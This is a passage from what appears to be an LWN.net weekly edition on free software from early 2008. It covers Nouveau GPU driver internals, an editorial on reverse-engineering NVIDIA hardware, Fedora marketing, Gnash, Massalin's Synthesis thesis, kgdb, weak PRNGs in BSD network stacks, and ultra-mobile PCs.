located somewhere in a shared memory area (AGP memory, PCIGART, or video
RAM). The GPU will also have a set of state information that is used to
process these commands, usually known as a context.

Most modern GPUs only contain a single command processing state
machine. However NVidia hardware has always contained multiple independent
"channels" which consist of a private FIFO (push buffer), a graphics
context and a number of context objects. The push buffer contains the
commands to be processed by the card.  The graphics context stores
application specific data such as matrices, texture unit configuration,
blending setup, shader information etc. Each channel has 8 subchannels to
which graphics objects are bound in order to be addressed by FIFO
commands.

Each NVidia card provides between 16 and 128 channels, depending on model;
these are assigned to different rendering-related tasks. Each 3D client has
an associated channel, while some are reserved for use in the kernel and
the X
server. Channels are context-switched by software via an interrupt (on older
cards) or automatically by the hardware on cards after the NV30.

Now what to store within the FIFO?  Each NVidia card offers a set of
objects, each of which provide a set of methods related to a given task,
e.g. DMA memory transfers or rendering.  Those methods are the ones used by
the driver (or on a higher level, the rendering application).  Whenever a
client connects, it uses an ioctl() to create the channel. After that the
client creates the objects it needs via an additional ioctl().

Currently we do have two types of possible clients: X (via the DDX driver)
and OpenGL via DRI/MESA. An accelerated framebuffer using the new
mode setting architecture (nouveaufb) will also be a future client to avoid
conflicts with nvidiafb.

Let's have a look at a small number of objects:


From this list, you can see that there are object types which are
available on all cards (NV_MEMORY_TO_MEMORY_FORMAT) while others are only
available on certain cards. For example, each class of card has its own
3D-engine object, such as NV10TCL on NV1x and NV20TCL on NV2x.  An object
is identified by a unique number: its "class". This id is 0x5f for
NV_IMAGE_BLIT, 0x9f for NV12_IMAGE_BLIT and 0x39 for
NV_MEMORY_TO_MEMORY_FORMAT.  If you want to use functionality provided by a
given object, you must first bind this object to a subchannel. The card
provides a certain number of subchannels which correspond to a certain
number of "active" (or "bound") objects.

A command in the FIFO is made of a command header, followed by one or more
parameters.  The command header usually contains the subchannel number, the
method offset to be called, and the number of parameters (a command header
can also define a jump in the FIFO but this is outside the scope of this
document). Each method the object provides has an offset which has to be set in the
command.

In order to limit the number of command headers to be written, thereby
improving performance, NVidia cards will call several subsequent methods in
a row if you provide several parameters.

How do we refer to an object? The data written to the FIFO doesn't hold any
info about that...  Binding an object to a subchannel is done by writing
the object ID as an argument to method number 0. For example: 00044000
5c00000c binds object id 5c00000c to subchannel 2. This object ID is used
as a key in a hash table kept in the card's memory which is filled up when
creating objects.

The creation of an object relies on special memory areas.
RAMIN is "instance memory", an area of memory through which the graphics
engines of the card are configured.  A RAMIN area is present on all NVIDIA
chipsets in some form, but it has evolved quite a bit as newer chipsets have
been released.  Basically, RAMIN is what contains the objects. An object is
usually not big (128 bytes in general, up to a few kilobytes in case of DMA
transfer objects).


There are also a few specific areas in RAMIN that are worth mentioning:


 RAMFC, the FIFO Context Table.  It is a global table that stores the
configuration/state of the FIFO engine for each channel.  It doesn't exist
in the same way on NV5x, where the FIFO has registers that contain pointers to each  
    channel's PFIFO state, rather than a single global table.

 RAMHT, the FIFO hash table.  A global table, used by PFIFO to locate context
objects, except on NV5x, where each channel has its own hash table.


Additional information can be found on the Nv object
types and Honza Havlicek
pages on the Nouveau site.


		Reverse engineering: more than NVIDIA deserves?


Reverse engineering is a longstanding tradition in the free software
community.  It has often been the only way to get hardware to work when the
manufacturer refuses to make documentation available, but there is more to
it than that.  Some of us, certainly, enjoy the challenge of figuring out
how a particular device works.  And our sense of freedom tells us that it
is our right to understand the hardware which we have purchased and
rightfully own.  We, as a group, tend not to respond well to those who tell
us that reverse engineering a product is not the right thing to do.  But,
increasingly, your editor is hearing voices within the community which are
saying just that.


One of the most prominent reverse engineering projects at the moment is Nouveau, which is starting to
have some real success in making NVIDIA graphics adapters work with free
software; see this week's Kernel Page for an article on the state of this
project.  NVIDIA hardware has been a problem for a long time, of course. 
It is said to be nicely-designed, and it is certainly present in a
significant percentage of new machines, but NVIDIA has had no interest in
making free drivers (or documentation) available for some years.  So the
only way for owners of this hardware to use it with reasonable performance
under Linux is to use NVIDIA's proprietary kernel module, and that is a
price many of us are not willing to pay.


There are currently about eight developers working to make the Nouveau
driver better.  They have reached a point where their understanding of the
hardware and their reverse engineering tools are quite good; that, in turn,
is enabling fast progress toward the creation of a working driver.  With
this kind of developer attention, the Nouveau driver may reach a stable
state over the course of the next year, at least for some versions of the
hardware.  And that, it seems, should be a good thing.


Except for one little issue.  NVIDIA's competition in this market is
provided mainly by Intel and AMD/ATI.  Intel provides free drivers for its
hardware as a matter of company policy, and AMD has pushed a much more
friendly policy onto ATI since the middle of last year.  So free drivers
for Intel video adapters come with distributions, and the first ATI drivers
are beginning to become available.  


One rather perverse result of this situation is that there are almost no
community developers working on the Intel drivers at all.  The development
and maintenance of those drivers is an expense carried by Intel alone.  One
could argue that the lack of hardware documentation from Intel has made it
hard for other developers to participate; Intel is now beginning to address
that problem by burying the community in comprehensive, Creative
Commons-licensed hardware programming manuals.  It will be interesting to
see how much more community help Intel gets as a result of its
documentation release.


ATI, which has not, to date, provided working, free drivers, is arguably
getting more help from the community and, especially, from distributors who
have an interest in working drivers.  But that company, too, is putting in
resources of its own toward that goal.


NVIDIA, instead, is giving us nothing - and, in return, we are giving it
an eight-person development team dedicated to the production of free
drivers for its hardware.  Once Nouveau is in a working state, Linux users will be able to
buy NVIDIA hardware in the knowledge that it will simply work without
requiring them to download and use binary-only kernel modules.  The result
of that can only be higher sales for NVIDIA.


While talking to developers at linux.conf.au, your editor heard a number of
them say that NVIDIA does not deserve a gift of this magnitude from the
community.  We are now quite close to having free support for video
hardware at all performance levels, supplied by friendly
companies.  Rather than penalize those companies by making a free gift to
their biggest competitor, some say, shouldn't NVIDIA be made to pay for its
behavior by exclusion from our community until it comes around?


There is a point here.  The biggest lever we have when talking with
hardware companies (or any company, for that matter) is money.  Companies
which see themselves as missing out on the Linux market will find a strong
incentive to change their behavior.  So if NVIDIA finds that system
resellers are not using its chipsets for Linux-based systems, it will have
to reconsider its position with regard to free drivers.  


In the past, there was no credible alternative to NVIDIA, so the company
had no real reason to fear that it could lose money as a result of its
uncooperative behavior.  Now there are well-supported alternatives at the
lower end of the market, and the prospect of the same for high-end graphics
as well.  So there will be no need to buy hardware from this particular
vendor, and, since the alternatives will be well supported, every reason to
buy from somebody else.  


Unless NVIDIA's hardware, too, is made to work via a community-supported
driver.  Should this happen, one could well say that we, as a community,
have taken a prize away from companies which have treated us well and
handed it to their competitor (which has not).  Arguably, the community
should not pursue the creation of reverse-engineered drivers in situations
where competing vendors are playing by our rules.  Otherwise, we are
sending a rather conflicted message to both types of companies.  It may
really be true that, in the long run, the Nouveau driver is harmful to our
real interests.


All of this discussion may be moot.  There's no way that any of us could keep
others from reverse-engineering their hardware and writing drivers, even if
we wanted to.  Anybody arguing against the mainline inclusion of a
GPL-licensed driver for popular hardware is likely to end up in a minority
position, to say the least.  So, as a community, we cannot make a
collective decision to stop this kind of development.  But, as individual
developers, we may occasionally want to give a moment's thought to the
question of whether our activities are truly beneficial in the long run.

		Marketing Fedora


It is an exciting time for free software as massive strides forward
have been made in increasing both market share and mind share within
the less technically orientated circles of society. Ubuntu is now
available pre-installed on Dell systems, SUSE on Lenovo systems, the
Xandros based eeePC has sold millions already and the One Laptop Per
Child project has gone into mass production. Stephen Fry, the popular
British actor, is even pledging his support
in national newspapers. Taking advantage of this momentum and using it
to help extend existing communities is going to be vital for any free
software project, and with this in mind Fedora is seeking to set
itself on solid ground with a revitalised marketing effort which hopes
to both define Fedora's position in the world and find new ways of
growing its user and contributor base.

Recently the first tentative steps have been made along this path with
the revitalising of Fedora's community marketing team.  In Fedora talk
there is now an official Special Interest Group (SIG).  Following on from a
session at the recent Fedora Users' and Developers' Conference the SIG
is gaining a lot of momentum, with input from Red Hat's professional
marketing team pouring in. This help is being provided on top of their
Red Hat duties, and so their involvement is exactly the same as that
of any other community members. So far their contributions have
largely been aiding the creation of a long term marketing
plan for Fedora, which will help to provide a more consistent message
across Fedora's many outlets. This means that not only will Fedora's
community Ambassadors be better briefed on what the key promotional
aspects of Fedora are, but they'll have a better understanding of the
best methods to achieve this and more support in terms of marketing
collateral.  The same benefits will also apply to Fedora's online
marketing efforts, including their Developer
Interviews and Release
Overviews.

Creating this plan still depends on overcoming a number of challenges.
Foremost amongst these is understanding exactly what Fedora is, and
what its target audience is. Recently Fedora has gone from being a
simple distribution, to the upstream for an increasing number of
projects.  Thanks to its open build tools and custom re-spinning
applications there are a growing number of custom spins, and
other projects such as the Creative Commons LiveContent CDs
and DVDs, as well as offerings from the Fedora Unity Project.  Graphical tools
such as Revisor have made
re-spinning easy.  Other Fedora derivatives, notably Red Hat Enterprise
Linux and the OLPC, don't rely on the custom re-spinning applications, but
do rely on Fedora source code to build their distributions.

To accompany this, and widening Fedora's mission even further is the newly
launched beta of a service called Fedora
TV. Its goals are to encourage the use and development of free media
formats such as OGG Vorbis/Theora, PNGs and SVGs, as well as encouraging
the continued development of the free software tools to create media in
these formats.

This is not to say that Fedora is no longer focused on its core
purpose of providing a distribution which showcases the latest and
greatest free software has to offer. Fedora 9 (Sulphur) Alpha was
released recently and a quick glance at its release
notes shows a lot of interesting new features appearing. Along
with the usual bundle of software updates, including KDE 4 and GNOME
2.21.4, a lot of attention has been given to Anaconda, Fedora's system
installer.  In particular Anaconda now has the ability to resize partitions
as well as create and install the system on encrypted partitions. Also
exciting is the inclusion of FreeIPA, a system
which "... combines the power of the Fedora Directory Server with
FreeRADIUS, MIT Kerberos, NTP and DNS to provide an easy, out of the box
solution" for managing various auditing, identity and policy
processes. If the events following Fedora 8's release are anything to go
by, we can expect to see many of these features appearing in other
distributions during the autumn 2008 and spring 2009 release cycles.

Also a significant challenge for the Fedora Marketing SIG is not just
defining what Fedora is, but persuading people that they want to be a
part of it.  In the short term this means promoting the large amount of
work that Fedora does upstream and making it as easy as possible for people
to get involved by lowering their barriers to entry. In the long term this
means, as Paul Frields, Fedora's new project leader, recently commented,
overcoming the "... decline of volunteerism in the USA overall
..."

Of course, talk and good intentions are wonderful, but without
practical results are meaningless. To this end the Fedora Marketing
SIG is already beginning to pick up speed.  Concrete, long term plans
are being laid with the aid of Red Hat's professionals; and in the
short term Fedora seems to be cropping up in popular news sites more
often than it has done for quite a while.  Fedora developers are gaining
increased recognition for the work that they put in, which often shows up
in other distributions. With the release of Fedora 9 (Sulphur) Alpha, and
the increased attention that this received in comparison to previous early
development releases, as well as an already impressive set of new features,
the future seems bright.

		Rob Savoye discusses the Gnash project


On February 14, 2008 the
Boulder Linux Users Group
presented a talk by Rob Savoye entitled
Gnash, and the quest for Open Media politics and legalities.
This article aims to cover some of the key points raised by Rob.
The Gnash
home page describes the project:


Gnash is a GNU 
Flash movie player.
Previously, it was only possible to play flash movies with proprietary software. While there are some other free flash players, none support anything beyond SWF v4. Gnash is based on
GameSWF,
and supports many SWF v7 features.


Gnash is cross-platform software.  It currently works on the Linux,
MacOS, Windows and some embedded platforms.  Under Linux, it runs on
the KDE, Gnome and FLTK desktop environments.  Gnash can be run in
standalone mode or as a browser plugin for Mozilla Firefox and
Konqueror.  The software currently runs on small platforms such as
cell phones and PDAs, larger desktop systems and game platforms.
Gnash does not yet run on the 
ROCKbox platform, but that is an interesting idea.
Gnash has been developed with efficiency in mind from the beginning.
One of the main design goals has been to trap all possible errors
and deal with them correctly.


The
Open Media Now! Foundation
has been created as a support base for Gnash:


OMNow is a foundation dedicated to the development, support and empowerment of an open media infrastructure. Upon this infrastructure stand companies and individuals who need free media solutions. Free media solutions save companies money and give them control over product technology. Such solutions support individuals by offering them legal ways to create, distribute and display their creative works. Our foundation opens the media market by actively developing operating system-agnostic and cross-platform solutions.


Gnash development originally started because of a need for an open-source
alternative to proprietary Flash/FLV players.
Red Hat's Bob Young is supporting the Gnash project.  His desire was to
have a legal, but free client that allowed Linux users to view
online video sites like YouTube.

<!-- LWNPutAdHere -->

Gnash development has been done using a
Clean room reverse engineering technique.
By agreeing to the license for the Adobe (formerly Shockwave) Flash
player, a developer gives up the right to develop a competing product.
This has limited the input from some "tainted" developers to only
remotely testing the application and reporting bugs.
Rob made a number of comments on the Gnash development process.
Reverse engineering of a proprietary format has been
tricky, it involved a lot of effort from numerous people.
Developers involved in this type of project require a lot of
personal motivation.
After enough hours staring at hex dumps, one is able to recognize
data structures and read the text represented by hex-encoded ASCII.
Patterns emerge in the hex output, some apparent bugs have even been
found in the data generated by proprietary CODECs.


The Gnash project has wider goals than just providing a free
media player.  The writing of open-source creation tools, servers
and clients is in the planning stages.
One interesting concept is to have Gnash negotiate with a content
server and automatically switch to a free CODEC mid stream.
There are plans to support a broader selection of free video
CODECs.  This is somewhat hampered by the numerous and fuzzy
legal issues around CODECs.


FLV is currently the most common online video format,
it tends to lock users in and has successfully locked in the market.
Gnash hopes to break this lock by giving Gnash free CODECs with
more features such as higher quality video and better bandwidth
utilization.
Interestingly, the mobile phone platform, which has a much
quicker design cycle turnaround, may lead the way for open video
formats.  Due to its small memory footprint, Gnash is often the best,
if not only option for providing video on phones.


Patent-free CODECs can have a large appeal to content providers.
With proprietary CODECs, it is up to the provider to pay the licensing
fees.  This can often consume most of the profit such an organization
brings in.  Free CODECs will enable a much larger group of content
providers to open up.
The Wikipedia online encyclopedia project has recently started

experimenting with a collaborative video project.


Rob mentioned one interesting side topic that applies to many free
software projects.  There are three stages of project development.
The first is making software that works in basic way.  This is relatively
easy, and is where many projects get stuck.  The next stage is to
make the software work well.  Some, but not many, free software projects
graduate to this level.  The last stage is to make a product.
This is something that only a few free software projects ever achieve.
A product works well for almost all users and is easy to figure out.
Bugs are rarely encountered.  It can take more effort to move to the
product level than the other stages combined.


Wrapping things up, Rob mentioned that the Gnash project is very much
in need of some assistance from a GUI expert, knowledge of both KDE
and GNOME is desirable.  Interested people should apply.
Also, a new release of Gnash should be out fairly soon.


		KHB: Synthesis: An Efficient Implementation of Fundamental Operating Systems Services


When I was but a wee computer science student at New Mexico Tech, a
graduate student in OS handed me an inch-thick print-out and told me
that if I was really interested in operating systems, I had to read
this.  It was something about a completely lock-free operating system
optimized using run-time code generation, written from scratch in
assembly running on a homemade two-CPU SMP with a two-word
compare-and-swap instruction - you know, nothing fancy.  The print-out
I was holding was Alexia (formerly Henry) Massalin's PhD thesis, Synthesis: An
Efficient Implementation of Fundamental Operating Systems Services
(html version
here).  Dutifully, I read the entire 158 pages.  At the end, I
realized that I understood not a word of it, right up to and including
the cartoon of a koala saying "QUA!" at the end.  Okay, I exaggerate -
lock-free algorithms had been a hobby of mine for the previous few
months - but the main point I came away with was that there was a lot
of cool stuff in operating systems that I had yet to learn.


Every year or two after that, I'd pick up my now bedraggled copy of
"Synthesis" and reread it, and every time I would understand a little
bit more.  First came the lock-free algorithms, then the run-time code
generation, then quajects.  The individual techniques were not always
new in and of themselves, but in Synthesis they were developed,
elaborated, and implemented throughout a fully functioning UNIX-style
operating system.  I still don't understand all of Synthesis, but I
understand enough now to realize that my grad student friend was
right: anyone really interested in operating systems should read this
thesis.

Run-time code generation

The name "Synthesis" comes from run-time code generation - code
synthesis - used to optimize and re-optimize kernel routines in
response to changing conditions.  The concept of optimizing code
during run-time is by now familiar to many programmers in part from
Transmeta's processor-level code optimization, used to lower power
consumption (and many programmers are familiar with Transmeta as the
one-time employer of Linus Torvalds.)


Run-time code generation in Synthesis begins with some level of
compile-time optimization, optimizations that will be efficient
regardless of the run-time environment.  The result can thought of as a
template for the final code, with "holes" where the run-time data will
go.  The run-time code generation then takes advantage of
data-dependent optimizations.  For example, if the code evaluates A *
B, and at run-time we discover that B is always 1, then we can generate
more efficient code that skips the multiplication step and run that
code instead of the original.  Fully optimized versions of the code
pre-computed for common data values can be simply swapped in without
any further run-time computation.  Another example from the thesis:


[...] Suppose that the compiler knows, either through static
control-flow analysis, or simply by the programmer telling it through
some directives, that the function f(p1, ...) = 4 * p1 +
... will be specialized at run-time for constant p1.  The compiler can
deduce that the expression 4 * p1 will reduce to a constant, but it
does not know what particular value that constant will have.  It can
capture this knowledge in a custom code generator for f that
computes the value 4 * p1 when p1 becomes known and stores it in the
correct spot in the machine code of the specialized function
f, bypassing the need for analysis at run-time.


Run-time code generation in Synthesis is a fusion of compile-time and
run-time optimizations in which useful code templates are created at
compile time that can later be optimized simply and cleanly at run
time.

Quajects

Understanding run-time code generation is a prerequisite for
understanding quajects, the basic unit out of which the Synthesis
kernel is constructed.  Quajects are almost but not quite entirely
unlike objects.  Like objects, quajects come in types - queue quaject,
thread quaject, buffer quaject - and encapsulate all the data
associated with the quaject.  Unlike objects, which contain pointers
to functions implementing their methods, quajects contain the code
implementing their methods directly.  That's right - the actual
executable instructions are stored inside the data structure of the
quaject, with the code nestled up against the data it will operate on.
In cases where the code is too large to fit in the quaject, the code
jumps out to the rest of the method located elsewhere in memory.  The
code implementing the methods is created by filling in pre-compiled
templates and can be self-modifying as well.


Quajects interact with other quajects via a direct and simple system
of cross-quaject calls: callentries, callouts, and callbacks.  The
user of quaject invokes callentries in the quaject, which implement
that quaject's methods.  Usually the callentry returns back to the
caller as normal, but in exceptional situations the quaject will
invoke a method in the caller's quaject - a callback.  Callouts are
places where a quaject invokes some other quaject's callentries.


Synthesis implements a basic set of quajects - thread, queue, buffer,
clock, etc. - and builds higher-level structures by combining
lower-level quajects.  For example, a UNIX process is constructed out
of a thread quaject, a memory quaject, and some I/O quajects.


As an example, let's look at the queue quaject's interface.  A queue
has two callentries, queue_put and queue_get.  These
are invoked by another quaject wanting to add or remove entries to and
from the queue.  The queue quaject also has four callbacks into the
caller's quaject, queue_full, queue_full-1,
queue_empty, and queue_empty-1.  When a caller
invokes the queue_put method and the queue is full, the queue
quaject invokes the queue_full callback in the caller's
quaject.  From the thesis:


The idea is: instead of returning a condition code for interpretation
by the invoker, the queue quaject directly calls the appropriate
handling routines supplied by the invoker, speeding execution by
eliminating the interpretation of return status codes.  


The queue_full-1 method is executed when a queue has
transitioned from full to not full, queue_empty when the queue doesn't
contain anything, and queue_empty-1 when the queue
transitions from empty to not empty.  With these six callentries and
callbacks, a queue is implemented in a generic, extensible, yet
incredibly efficient manner.


Pretty cool stuff, huh?  But wait, there's more!

Optimistic lock-free synchronization

Most modern operating systems use a combination of interrupt disabling
and locks to synchronize access to shared data structures and
guarantee single-threaded execution of critical sections in general.
The most popular synchronization primitive in Linux is the spinlock,
implemented with the nearly universal test-and-set-bit atomic
operation.  When one thread attempts to acquire the spinlock guarding
some critical section, it busy-waits, repeatedly trying to acquire the
spinlock until it succeeds.


Synchronization based on locks works well enough but it has several
problems: contention, deadlock, and priority inversion.  Each of these
problems can be (and is) worked around by following strict rules: keep
the critical section short, always acquire locks in the same order,
and implement various more-or-less complex methods of priority
inheritance.  Defining, implementing, and following these rules is
non-trivial and a source of a lot of the pain involved in writing code
for modern operating systems.


To address these problems, Maurice Herlihy proposed a system of
lock-free synchronization using an atomic compare-and-swap
instruction.  Compare-and-swap takes the address of a word, the
previous value of the word, and the desired new value of the word.  It
swaps the previous and new values of the word if and only if the
previous value is the same as the current value.  The bare
compare-and-swap instruction allows atomic updates of single pointers.
To atomically switch between larger data structures, a new copy of the
data structure is created, updated with the changes, and the addresses
of the two data structures swapped.  If the compare-and-swap fails
because some other thread has updated the value, the operation is
retried until it succeeds.


Lock-free synchronization eliminates deadlocks, the need for strict
lock ordering rules, and priority inversion (contention on the
compare-and-swap instruction itself is still a concern, but rarely
observed in the wild).  The main drawback of Herlihy's algorithms is
that they require a lot of data copying for anything more complex than
swapping two addresses, making the total cost of the operation greater
than the cost of locking algorithms in many cases.  Massalin took
advantage of the two-word compare-and-swap instruction available in
the Motorola 68030 and expanded on Herlihy's work to implement
lock-free and copy-free synchronization of queues, stacks, and linked
lists.  She then took a novel approach: Rather than choose a general
synchronization technique (like spinlocks) and apply it to arbitrary
data structures and operations, instead build the operating system out
of data structures simple enough to be updated in an efficient
lock-free manner.


Synthesis is actually even cooler than lock-free: Given the system of
quajects, code synthesis, and callbacks, operations on data structures
can be completely synchronization-free in common situations.  For
example, a single-producer, single-consumer queue can be updated
concurrently without any kind of synchronization as long as the queue
is non-empty, since each thread operates on only one end of the queue.
When the callback for queue empty happens, the code to operate on the
queue is switched to use the lock-free synchronization code.  When the
quaject's queue-not-empty callback is invoked, the quajects switch
back to the synchronization-free code. (This specific algorithm is
not, to my knowledge, described in detail in the thesis, but was
imparted to me some months ago by Dr. Massalin herself at one of those
wild late-night kernel programmer parties, so take my description with
a grain of salt.)


The approach to synchronization in Synthesis is summarized in the
following quote:


 Avoid synchronization whenever possible.
 Encode shared data into one or two machine words.
 Express the operation in terms of one or more fast lock-free data
structure operations.
 Partition the work into two parts: a part that can be done
lock-free, and a part that can be postponed to a time when there can
be no interference.
 Use a server thread to serialize the operation.  Communications
with the server happens using concurrent, lock-free queues.


The last two points will sound familiar if you're aware of Paul McKenney's
read-copy-update (RCU) algorithm.  In Synthesis, thread structures
to be deleted or removed from the run queue are marked as such, and
then actually deleted or removed by the scheduler thread during normal
traversal of the run queue.  In RCU, the reference to a list entry is
removed from the linked list while holding the list lock, but the
removed list entry is not actually freed until it can be guaranteed
that no reader is accessing that entry.  In both cases, reads are
synchronization-free, but deletes are separated into two phases, one
that begins the operation in an efficient low-contention manner, and a
second, deferred, synchronization-free phase to complete the
operation.  The two techniques are by no means the same, but share a
similar philosophy.

Synthesis: Operating system of the future?

The design principles of Synthesis, while powerful and generic, still
have some major drawbacks.  The algorithms are difficult to understand
and implement for regular human beings (or kernel programmers, for
that matter).  As Linux has demonstrated, making kernel development
simple enough that a wide variety of people can contribute has some
significant payoffs.  Another drawback is that two-word
compare-and-swap is, shall we say, not a common feature of modern
processors.  Lock-free synchronization can be achieved without this
instruction, but it is far less efficient.  In my opinion, reading
this paper is valuable more for retraining the way your brain thinks
about synchronization than for copying the exact algorithms.  This
thesis is especially valuable reading for people interested in
low-latency or real-time response, since one of the explicit goals of
Synthesis is support for real-time sound processing.


Finally, I want to note that Synthesis contains many more elegant
ideas that I couldn't cover in even the most superficial detail -
quaject-based user/kernel interface, per-process exception tables,
scheduling based on I/O rates, etc., etc.  And while the exact
implementation details are fascinating, the thesis is also peppered
with delightful koan-like statements about design patterns for
operating systems.  Any time you're feeling bored with operating
systems, sit down and read a chapter of this thesis.


[ Valerie Henson is a Linux file
systems consultant and proud recipient of a piggy-back ride from
Dr. Alexia Massalin. ]


		kgdb getting closer to being merged?


The kernel source level debugger, kgdb, has been around for a long time, but
never in the mainline tree.  Linus Torvalds is not much of a fan of
debuggers in general and has always resisted the inclusion of kgdb.  That
looks like it might be changing somewhat, with the inclusion of kgdb in
2.6.26 now a distinct possibility.


Over the years, Torvalds has made various pronouncements about debuggers,
particularly kernel debuggers, a long message to
linux-kernel in 2000 seems to outline his objections:

I happen to believe that not having a kernel debugger forces people to
think about their problem on a different level than with a debugger. I
think that without a debugger, you don't get into that mindset where you
know how it behaves, and then you fix it from there. Without a debugger,
you tend to think about problems another way. You want to understand
things on a different _level_.

 An attempt to sneak kgdb into the mainline via x86 architecture updates
failed, but Torvalds did open the
door a crack towards merging the kgdb changes: "I won't even
consider pulling it unless it's offered as a separate tree, not mixed up
with other things. At that point I can give a look."  That has
spawned the kgdb-light effort, spearheaded by Ingo Molnar.

The original hope to get it
included into 2.6.25 has been dashed, but with Molnar rapidly iterating
to address kernel hacker concerns, the amount of complaints seems to be
decreasing.  Molnar is up to version 10 of the
kgdb-light patchset in something like three days since the first was
posted.  The various linux-kernel threads show a number of very
hopeful developers waiting with bated breath to see if kgdb can finally
make its way into the mainline.


The light version of kgdb still has most of the capabilities of the
original kgdb and any additional, possibly more intrusive, features can be
added later.  Molnar is clearly trying to do things the right way, with a
merge of the non-intrusive kgdb functionality that can eventually be used by multiple
architectures.  He points out that there are already gdb remote stubs in
three separate architectures in the mainline, continuing:

So we could have done it the same way, by doing cp kernel/kgdb.c 
arch/x86/kernel/gdb-stub.c and merging that. Nobody could have said a 
_single_ word - we already have lowlevel UART code in early_printk.c 
that we could have reused.

But we wanted to do it _right_ and not add an arch/x86/kernel/gdb-stub.c 
special hack.


Discussions about the patches have been mostly to point out problems or
areas that need cleaning up.  The philosophical objections have been mostly
avoided, quite possibly because Molnar has been scrupulously trying to make
a "no impact" set of patches:

this kgdb series has _obviously_ zero impact on the kernel, 
because it just does not touch any dangerous codepath. From this point 
on KGDB can evolve in small, well-controlled baby steps, as all other 
kernel code as well.


To that end, the patch changes 22 files (rather than the 41 touched by the
original kgdb submission), removing "_all_ critical path
impact" and the low-level serial drivers—as Molnar points out,
kgdb should not be in the driver business.  In addition, the "kgdb over
polled consoles" support has been reworked and cleaned up.  Various hacks
to get at module symbols have been removed as a better solution for
that problem is needed.  So far, no show stopping problems have been
identified, so it really seems to come down to what Torvalds thinks; for that,
we may have to wait until the 2.6.26 merge window opens in April or May.


		The dangers of weak random numbers


Amit Klein has been looking into pseudo-random number generators (PRNG) again. He
has found a number of problems in the algorithms that make it easier to
guess the next number generated.  Much like his earlier work on Berkeley
Internet Name Daemon (BIND), Klein found that with a small amount of
traffic, predicting the next DNS transaction ID or IP fragmentation ID is
possible.  Anything that uses random numbers for security purposes—as
opposed to, say, choosing which fortune to
deliver—needs to ensure that their random numbers are
cryptographically strong.


In his report,
Klein looks at a specific algorithm that has been implemented, with slight
variations, in multiple places.  It was introduced into OpenBSD in 1997 to
randomize two 16-bit IDs to protect against predictability.  Prior
to that, both DNS transaction IDs and IP fragmentation IDs were essentially
just incrementing counters.  Various attacks, like idle scanning and DNS cache
poisoning were possible because those IDs could be predicted.

 The OpenBSD PRNG algorithm was then used in their BIND 9
implementation, replacing the solution that Internet Systems Consortium
(ISC)—maintainer of BIND—had used.  ISC added a random number
for the 16-bit DNS transaction ID, instead of an incrementing counter, as
part of BIND 9.  Klein's earlier work found problems with that
PRNG—avoided by the OpenBSD version—leading to a certain
amount of smugness
on the part of the OpenBSD folks.  

It is clear that the OpenBSD algorithm is better than the one ISC
introduced in BIND 9, but Klein was still able to find ways to break it.
The method requires much more computation than was needed to crack BIND 9
transaction IDs, roughly six minutes of computation on a fairly high-end
processor.  Klein presents various ideas to parallelize the algorithm for
multi-core or multi-processor computation that could bring that number way
down.  So, there is no working exploit available, but it is well
within the grasp; a determined attacker could make use of the techniques to
poison the cache of OpenBSD servers.


In addition, Klein found ways to exploit the IP fragmentation ID
predictability to do idle scanning, host operating system fingerprinting,
and other kinds of information leaks; it may also be possible to inject an
attacker-controlled packet into a TCP/IP connection, called a blind data
injection.  The belief in the strength of the OpenBSD PRNG made it an attractive
option for others in the BSD family to adopt.  NetBSD, FreeBSD, and
DragonFly BSD all adopted a variant of the algorithm for the IP
fragmentation ID, as did the FreeBSD-derived Mac OS X.


It should be noted that only OpenBSD and Mac OS X enable the fragmentation
ID randomization by default, the others have a setting for it, but their
default behavior is sequential IDs (i.e. id++) which is clearly even easier
to predict.  The security team for each of the OSes had a fairly
predictable response, with one notable exception.  NetBSD, FreeBSD, and DragonFly
BSD all changed the PRNG algorithm for less predictability; Apple claimed
to be working on the problem but could not provide a timeline for a fix.


The exceptional response came from OpenBSD, who are "completely
uninterested in the problem," according to an email from the OpenBSD
coordinator (presumably Theo de Raadt) that Klein quotes.  The email goes
on to say that the problem is "completely irrelevant in the real world."
This kind of bluster is surprising from the OS that prides itself on
security; it was, after all, the first to introduce randomization of these
IDs.  It may be that exploiting the predictability is hard to do, but
Klein's techniques clearly reduce the search space drastically which is not
what you want from a PRNG.  The other BSDs found it important enough to
change, what does OpenBSD know that they don't?

 It would be foolish for Linux users to write this off as a "BSD
problem"—though the random numbers used for IP fragmentation IDs by
Linux are considered to be cryptographically strong—because there
very well may be problems elsewhere in Linux or the applications that are
typically run on it.  We are not immune to making mistakes, so all uses of
random numbers should be scrutinized.  New development needs to remember
these lessons of the past as well, so that we can avoid this kind of
problem in the future.

		Directions in UMPC-land


It is an exciting time for Linux users who are interested in ultra-mobile
PCs (UMPCs).  New models are being announced frequently with
many—dare we say most?—coming with at least the option to have
Linux pre-installed.  The low-cost models probably require Linux in order
to  make their price point, but even higher-end UMPCs seem to be made with
Linux firmly in mind.  In many ways, the One
Laptop Per Child (OLPC) project has driven the demand for low-cost
machines for adults as well. 


Commercial offerings from ASUS (Eee PC), Everex (Cloudbook), Elonex (One),
along with a rumored
UMPC from HP are giving both the OLPC and Intel's ClassmatePC some
competition.  Add in Nokia's N810 and you have a half-dozen very mobile
solutions featuring Linux—though the ClassmatePC seems to be more
geared towards Windows XP.  None of them has quite the right set of
features to be the ultimate UMPC, but we seem to be headed in the right
direction, so it is worth contemplating what that machine might look like.

 Battery life is the achilles heel of mobile devices; some kind of
breakthrough in power consumption or energy storage needs to happen for big
strides to be made in this area.  Because of weight considerations, today's
UMPCs tend to have small batteries and three hours or less of battery life.
Something on the order of twelve hours—with a measurement in days
being the real goal—is more like what is needed.  Perhaps some kind
of human-powered or alternative charging mechanism can play a role.  It is
probably the biggest challenge to reaching something approaching an
ultimate device.  

Part of the reason that battery life is so low is because of how much power
the display consumes.  With rotating media on its way out (at least for
these kinds of devices), the display is one of the areas where power
savings would be felt most strongly.  The E-Ink displays, such as those
used by the newer e-book readers, have some great properties in terms of
power consumption, but the speed at which they update makes them
undesirable for general computer use.  Many of us spend a fair amount of time
looking at a static screen for several to many seconds at a time.  Web
pages or e-books might be candidates for using E-Ink, perhaps, but not
Wesnoth or typing a document.


Perhaps a dual-mode screen that
combined an LED and E-Ink display could blend the best of both.  OLPC has
an innovative display with many of the characteristics needed which can also
can be viewed in sunlit conditions.  Former OLPC CTO Mary Lou
Jepsen's startup is licensing the XO display technology, so we may see it in a
UMPC before too long. 


The size of the display will likely need to be larger than today's
offerings as well.  That will be a balancing act between size, weight, and cost
which will be interesting to see play out.  A touchscreen is another feature
that will be necessary as the display should be usable separate
from the keyboard.  Some way of transforming a small laptop into a tablet
